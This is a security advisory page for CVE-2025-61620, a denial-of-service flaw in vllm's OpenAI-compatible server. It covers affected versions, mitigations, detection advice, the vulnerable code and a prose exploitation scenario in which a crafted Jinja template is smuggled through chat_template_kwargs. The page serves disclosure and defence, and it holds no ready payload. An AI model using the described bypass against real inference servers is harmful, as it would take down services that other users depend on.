CVE-2025-61620: vllm: DoS via Jinja template injection in chat API

GHSA-6fvq-23cw-5628 MEDIUM
Published October 7, 2025
CISO Take

vllm's OpenAI-compatible server allows authenticated users to inject malicious Jinja templates via chat_template or chat_template_kwargs, exhausting CPU/memory and taking down LLM inference endpoints. The mitigation is non-trivial: blocking chat_template alone is insufficient because chat_template_kwargs can bypass controls via a dict.update overwrite. Upgrade to vllm >= 0.11.0 immediately; if not possible, restrict API access to fully-trusted clients and block both parameters at the gateway.

Risk Assessment

Medium CVSS (6.5) understates operational risk for organizations running vllm as a shared inference service. Exploitability is high — any authenticated API user can trigger it with a single malformed request requiring no special AI/ML knowledge. The non-obvious bypass via chat_template_kwargs means operators who implement partial mitigations remain fully exposed. In multi-tenant, developer-facing, or internally-shared deployments, this is a realistic availability risk with immediate blast radius across all downstream AI-dependent workloads.

Affected Systems

Package Ecosystem Vulnerable Range Patched
vllm pip >= 0.5.1, < 0.11.0 0.11.0
78.9K 126 dependents Pushed 6d ago 56% patched ~32d to patch Full package profile →

Do you use vllm? You're affected.

Severity & Risk

CVSS 3.1
6.5 / 10
EPSS
N/A
Exploitation Status
No known exploitation
Sophistication
Trivial

Attack Surface

AV AC PR UI S C I A
AV Network
AC Low
PR Low
UI None
S Unchanged
C None
I None
A High

Recommended Action

5 steps
  1. PATCH

    Upgrade to vllm >= 0.11.0 (fix in PR #25794, commit 7977e50).

  2. CRITICAL WORKAROUND

    Block BOTH chat_template AND chat_template_kwargs at the API gateway — blocking only chat_template is insufficient due to the dict.update bypass path.

  3. ACCESS CONTROL

    Restrict vllm API endpoints to fully-trusted internal clients; never expose directly to end users or the internet without an authenticated proxy.

  4. RESOURCE LIMITS

    Implement request timeouts and per-request CPU/memory quotas on the inference server to contain blast radius.

  5. DETECTION

    Alert on requests containing chat_template or chat_template_kwargs fields in API request logs; monitor for sudden CPU/memory spikes on inference nodes correlating with individual API requests.

Classification

Compliance Impact

This CVE is relevant to:

EU AI Act
Art. 9 - Risk management system
ISO 42001
A.9.3 - AI system risk treatment
NIST AI RMF
MANAGE-2.2 - Risks or benefits of the AI system are communicated and managed
OWASP LLM Top 10
LLM04 - Model Denial of Service

Frequently Asked Questions

What is CVE-2025-61620?

vllm's OpenAI-compatible server allows authenticated users to inject malicious Jinja templates via chat_template or chat_template_kwargs, exhausting CPU/memory and taking down LLM inference endpoints. The mitigation is non-trivial: blocking chat_template alone is insufficient because chat_template_kwargs can bypass controls via a dict.update overwrite. Upgrade to vllm >= 0.11.0 immediately; if not possible, restrict API access to fully-trusted clients and block both parameters at the gateway.

Is CVE-2025-61620 actively exploited?

No confirmed active exploitation of CVE-2025-61620 has been reported, but organizations should still patch proactively.

How to fix CVE-2025-61620?

1. PATCH: Upgrade to vllm >= 0.11.0 (fix in PR #25794, commit 7977e50). 2. CRITICAL WORKAROUND: Block BOTH chat_template AND chat_template_kwargs at the API gateway — blocking only chat_template is insufficient due to the dict.update bypass path. 3. ACCESS CONTROL: Restrict vllm API endpoints to fully-trusted internal clients; never expose directly to end users or the internet without an authenticated proxy. 4. RESOURCE LIMITS: Implement request timeouts and per-request CPU/memory quotas on the inference server to contain blast radius. 5. DETECTION: Alert on requests containing chat_template or chat_template_kwargs fields in API request logs; monitor for sudden CPU/memory spikes on inference nodes correlating with individual API requests.

What systems are affected by CVE-2025-61620?

This vulnerability affects the following AI/ML architecture patterns: LLM inference APIs, model serving, RAG pipelines, agent frameworks, multi-tenant AI platforms.

What is the CVSS score for CVE-2025-61620?

CVE-2025-61620 has a CVSS v3.1 base score of 6.5 (MEDIUM).

Technical Details

NVD Description

### Summary A resource-exhaustion (denial-of-service) vulnerability exists in multiple endpoints of the OpenAI-Compatible Server due to the ability to specify Jinja templates via the `chat_template` and `chat_template_kwargs` parameters. If an attacker can supply these parameters to the API, they can cause a service outage by exhausting CPU and/or memory resources. ### Details When using an LLM as a chat model, the conversation history must be rendered into a text input for the model. In `hf/transformer`, this rendering is performed using a Jinja template. The OpenAI-Compatible Server launched by vllm serve exposes a `chat_template` parameter that lets users specify that template. In addition, the server accepts a `chat_template_kwargs` parameter to pass extra keyword arguments to the rendering function. Because Jinja templates support programming-language-like constructs (loops, nested iterations, etc.), a crafted template can consume extremely large amounts of CPU and memory and thereby trigger a denial-of-service condition. Importantly, simply forbidding the `chat_template` parameter does not fully mitigate the issue. The implementation constructs a dictionary of keyword arguments for `apply_hf_chat_template` and then updates that dictionary with the user-supplied `chat_template_kwargs` via `dict.update`. Since `dict.update` can overwrite existing keys, an attacker can place a `chat_template` key inside `chat_template_kwargs` to replace the template that will be used by `apply_hf_chat_template`. ```python # vllm/entrypoints/openai/serving_engine.py#L794-L816 _chat_template_kwargs: dict[str, Any] = dict( chat_template=chat_template, add_generation_prompt=add_generation_prompt, continue_final_message=continue_final_message, tools=tool_dicts, documents=documents, ) _chat_template_kwargs.update(chat_template_kwargs or {}) request_prompt: Union[str, list[int]] if isinstance(tokenizer, MistralTokenizer): ... else: request_prompt = apply_hf_chat_template( tokenizer=tokenizer, conversation=conversation, model_config=model_config, **_chat_template_kwargs, ) ``` ### Impact If an OpenAI-Compatible Server exposes endpoints that accept `chat_template` or `chat_template_kwargs` from untrusted clients, an attacker can submit a malicious Jinja template (directly or by overriding `chat_template` inside `chat_template_kwargs`) that consumes excessive CPU and/or memory. This can result in a resource-exhaustion denial-of-service that renders the server unresponsive to legitimate requests. ### Fixes * https://github.com/vllm-project/vllm/pull/25794

Exploitation Scenario

An attacker with API credentials — an internal developer, a compromised service account, or a malicious user on a shared platform — sends a POST to /v1/chat/completions with a chat_template_kwargs body containing a chat_template key embedding a malicious Jinja template (e.g., nested loops iterating over exponentially large ranges). Because dict.update overwrites the server-side chat_template value, vllm processes the attacker-controlled template, consuming all available CPU and memory. The inference server becomes unresponsive to all legitimate traffic. In a shared GPU cluster, this disrupts every team dependent on the endpoint until the process is manually killed and restarted, with no data exfiltration required to achieve full service disruption.

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Timeline

Published
October 7, 2025
Last Modified
October 22, 2025
First Seen
March 24, 2026

Related Vulnerabilities